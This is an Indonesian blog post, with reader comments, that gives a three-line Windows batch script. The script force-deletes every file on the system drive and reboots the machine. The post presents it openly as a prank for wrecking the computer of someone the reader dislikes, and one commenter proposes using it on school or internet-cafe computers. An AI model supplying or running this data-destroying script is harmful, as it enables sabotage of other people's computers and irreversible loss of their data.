Cara Merusak System Windows XP dengan Notepad



Cara Merusak Windows XP dengan Notepad | Cirebon-Cyber4rt - Pada hari jum'at yang berbahagia ini saya akan share sebuah trick jail atau bisa dibilang jahat karena trick ini sifatnya merusak dan merugikan orang lain.
Cara Merusak System Windows XP dengan Notepad
Microsoft Windows XP
Apabila kalian punya teman atau kenalan yang kurang kalian sukai, mungkin karena dia suka pinjem duit ke kalian, suka telat bayar utang dll :p coba kalian pake cara ini buat ngerjain tuh si doi ( kalo dia punya PC ya... ) hehehee.
Trick ini sebenarnya sangatlah simple, kalian cukup menggunakan notepad dan imajinasi kalian. Berikut cara merusak system windows xp dengan notepad.
Tutorial :
1). Buka notepad lalu copy-paste script dibawah ini :
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

2). Simpan dengan extensi .bat

Cara menggunakannya cukup dengan Double-click pada file yang sudah kalian buat tadi, dan jangan heran kalo komputer/laptop kalian akan mati dan saya juga kurang tau bagaimana cara mengatasi windows xp yang sudah dirusak oleh notepad ber-script ini :p

Saya tidak bertanggung jawab apabila terjadi kerusakan pada komputer atau laptop!

Jalan terakhir untuk mengembalikan komputer/laptop yang mati ini mungkin adalah Install ulang =)) Jadi kalian pikirin baik-baik untuk tidak mencobanya di Komputer atau Laptop pribadi.
 
Sumber : Cirebo-Cyber4rt

4 Responses to "Cara Merusak System Windows XP dengan Notepad"

  1. dicoba di komputer sekolahan atau warnet aja nih pasnya

    ReplyDelete
  2. mantab gan.. senang bisa berkunjung kesini, semoga bermanfaat .salam kenal, kunjungan baliknya ditunggu

    www.produsensusukambingbubuk.com
    susu kambing etawa sari madu utama susu kambing global mandiri sejahtera susu kambing etawa

    ReplyDelete
  3. wah systemdrivenya dihapus ya jelas rusak,, wkwkkwk

    ReplyDelete

- Jika Berkomentar , Berkomentarlah Dengan Sopan Dan Baik
- Pakai Pilihan Anonymous jika Anda Tidak Mempunyai Blog.

- Di Larang Menautkan Link Secara Langsung
- Di Larang Politics Dalam Bentuk Apapun
- Di Larang Spam

MOHON MAAF JIKA COMENT ANDA TIDAK SAYA JAWAB KARENA SAYA TIDAK ONLINE 24 JAM DIKARENAKAN BANYAK URUSAN DI DUNIA NYATA.